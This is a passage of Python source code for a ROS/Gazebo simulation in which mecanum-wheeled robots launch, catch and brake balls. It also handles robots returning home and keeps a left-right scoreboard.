#print('\tTorque [Nm]: ', torque)
print('\tvo= : ', force[0]/0.057/100,force[1]/0.057/100,force[2]/0.057/100)"""
def del_ball(self):
srv_delete_model = rospy.ServiceProxy('gazebo/delete_model', DeleteModel)
#req = DeleteModelRequest()
#req.model_name = "ball_right"
res = srv_delete_model(self.delete_model_name)
#time.sleep(0.1)
def break_ball_rolling(self):
self.ball_state = self.g_get_state(model_name = self.spawn_name)
self.ball_pose = Pose()
self.ball_pose.position.x = float(self.ball_state.pose.position.x)
self.ball_pose.position.y = float(self.ball_state.pose.position.y)
self.ball_pose.position.z = float(self.ball_state.pose.position.z)
if abs(self.ball_pose.position.z) == 0 and self.cnt < 7:
duration = 0.01
self.cnt += 1
self.apply_force = [0,0,0]
apply_torque = [-self.apply_torque[0]/6,-self.apply_torque[1]/6,-self.apply_torque[2]/6]
self.total_break_torque = [self.total_break_torque[0] + apply_torque[0], self.total_break_torque[1] + apply_torque[1], self.total_break_torque[2] + apply_torque[2]]
rospy.wait_for_service('/gazebo/apply_body_wrench', timeout=10)
apply_wrench = rospy.ServiceProxy('/gazebo/apply_body_wrench', ApplyBodyWrench)
wrench = Wrench()
wrench.force = Vector3(*self.apply_force)
wrench.torque = Vector3(*apply_torque)
success = apply_wrench(
str(self.delete_model_name) + ":ball_link",
'world',
Point(0, 0, 0),
wrench,
rospy.Time().now(),
rospy.Duration(duration))
"""if self.cnt == 5:
duration = 0.01
self.apply_force = [0,0,0]
apply_torque = [-(self.apply_torque[0] + self.total_break_torque[0]),-(self.apply_torque[1] + self.total_break_torque[1]),-(self.apply_torque[2] + self.total_break_torque[2])]
print(self.apply_torque)
print(self.total_break_torque)
print(apply_torque)
print(np.array(self.total_break_torque) + np.array(apply_torque))
rospy.wait_for_service('/gazebo/apply_body_wrench', timeout=10)
apply_wrench = rospy.ServiceProxy('/gazebo/apply_body_wrench', ApplyBodyWrench)
wrench = Wrench()
wrench.force = Vector3(*self.apply_force)
wrench.torque = Vector3(*apply_torque)
success = apply_wrench(
self.ball_name,
'world',
Point(0, 0, 0),
wrench,
rospy.Time().now(),
rospy.Duration(duration))
#self.cnt += 1"""
class Make_mecanum_right(Make_mecanum_left):
def set_ball_target(self):
self.x_target = -(np.random.randint(6, 10) + np.random.rand())
self.y_target = (np.random.randint(-3, 3) + np.random.rand())
self.get_position()
self.x_error = self.x_target - self.object_pose.position.x
self.y_error = self.y_target - self.object_pose.position.y
self.s = -np.sqrt(self.x_error**2 + self.y_error**2)
def move(self, x_target, y_target, my_mecanum, away_mecanum):
t0 = time.time()
dt = 0
while True:
return_home(away_mecanum)
away_mecanum.break_ball_rolling()
away_mecanum.score, self.score, meg = ball_catch_check(my_mecanum, "ball_left", away_mecanum.score, self.score, away_mecanum)
if meg:
self.stop()
away_mecanum.stop()
break
self.get_position()
t1 = time.time()
dt = t1 - t0
self.x_error = self.object_pose.position.x - x_target
self.y_error = self.object_pose.position.y - y_target
#print(self.x_error, self.y_error)
if (abs(self.x_error) <0.1 and abs(self.y_error)< 0.1) :
self.stop()
away_mecanum.stop()
else:
self.set_x_velocity(dt)
self.set_y_velocity(dt)
if abs(self.x_error) < 0.1:
self.vel_forward_apply = 0
if abs(self.y_error) < 0.1:
self.vel_lateral_apply = 0
self.twist = Twist()
#print(self.vel_forward_apply, self.vel_lateral_apply)
self.twist.linear.x = self.vel_forward_apply
self.twist.linear.y = self.vel_lateral_apply
self.twist.linear.z = 0
self.wheel_vel = mecanum_wheel_velocity(self.twist.linear.x, self.twist.linear.y, self.twist.angular.z)
self.pub.publish(self.twist)
self.pub_wheel_vel_1.publish(self.wheel_vel[0,:])
self.pub_wheel_vel_2.publish(self.wheel_vel[1,:])
self.pub_wheel_vel_3.publish(self.wheel_vel[2,:])
self.pub_wheel_vel_4.publish(self.wheel_vel[3,:])
t0 = time.time()
def ball_catch_check(mecanum, ball_name, left_score, right_score, away_mecanum):
meg = False
g_get_state = rospy.ServiceProxy("/gazebo/get_model_state", GetModelState)
ball_state = g_get_state(model_name = ball_name)
mecanum.get_position()
ball_x = ball_state.pose.position.x
ball_y = ball_state.pose.position.y
ball_z = ball_state.pose.position.z
robot_x = mecanum.object_pose.position.x
robot_y = mecanum.object_pose.position.y
robot_z = mecanum.object_pose.position.z
distance = np.sqrt((robot_x - ball_x)**2 + (robot_y - ball_y)**2 + (robot_z - ball_z)**2)
distance_x = abs(ball_x - robot_x)
distance_y = abs(ball_y - robot_y)
distance_z = abs(ball_z - robot_z)
"""print("--------------------------------------------------")
print("\tdistance_x :",distance_x)
print("\tdistance_y :",distance_y)
print("\tdistance_z :",distance_z)
"""
if abs(ball_x) > 15:
left_score, right_score = score_board(left_score, right_score, ball_name)
print("--------------------------------------------------")
print("\tvelocity :", away_mecanum.v)
print("\tangle :", away_mecanum.launch_angle)
pass
if (distance_x < 0.6 and distance_y <0.6 and distance_z < 1) or abs(ball_x) > 15:
mecanum.del_ball()
meg = True
return left_score, right_score, meg,
return left_score, right_score, meg
def return_home(home_mecanum):
home_mecanum.get_position()
robot_x = home_mecanum.object_pose.position.x
robot_y = home_mecanum.object_pose.position.y
robot_z = home_mecanum.object_pose.position.z
robot_angle = np.rad2deg(home_mecanum.angle[2])
if robot_x < 0:
x_error = -11 - robot_x
y_error = -robot_y
home_mecanum.twist.angular.z = -robot_angle/100
if robot_x > 0:
x_error = robot_x - 11
y_error = robot_y
if robot_angle > 0 :
home_mecanum.twist.angular.z = (180 - robot_angle)/100
else:
home_mecanum.twist.angular.z = -(180 + robot_angle)/100
vel_forward_apply, vel_lateral_apply = home_mecanum.check_velocity(home_mecanum.vel_forward * (x_error*0.5),
home_mecanum.vel_lateral * (y_error*0.5))
home_mecanum.twist.linear.x = vel_forward_apply
home_mecanum.twist.linear.y = vel_lateral_apply
home_mecanum.twist.linear.z = 0
home_mecanum.wheel_vel = mecanum_wheel_velocity(home_mecanum.twist.linear.x, home_mecanum.twist.linear.y, home_mecanum.twist.angular.z)
home_mecanum.pub.publish(home_mecanum.twist)
home_mecanum.pub_wheel_vel_1.publish(home_mecanum.wheel_vel[0,:])
home_mecanum.pub_wheel_vel_2.publish(home_mecanum.wheel_vel[1,:])
home_mecanum.pub_wheel_vel_3.publish(home_mecanum.wheel_vel[2,:])
home_mecanum.pub_wheel_vel_4.publish(home_mecanum.wheel_vel[3,:])
if abs(x_error) <0.1 and abs(y_error)< 0.1 :
home_mecanum.stop()
def score_board(left, right, ball_name):
left_score = left
right_score = right
if ball_name == "ball_left":
left_score += 1
if ball_name == "ball_right":
right_score += 1
print("=====================================================")
#print("\n")
print("\t Left \t\t\t Right\t")
print("\t {} \t\t\t {} \t".format(left_score,right_score))
#print("\n")
print("=====================================================")
return left_score, right_score
| 35.558541
| 191
| 0.596837
| 14,592
| 0.78765
| 0
| 0
| 0
| 0
| 0
| 0
| 2,963
| 0.159937
|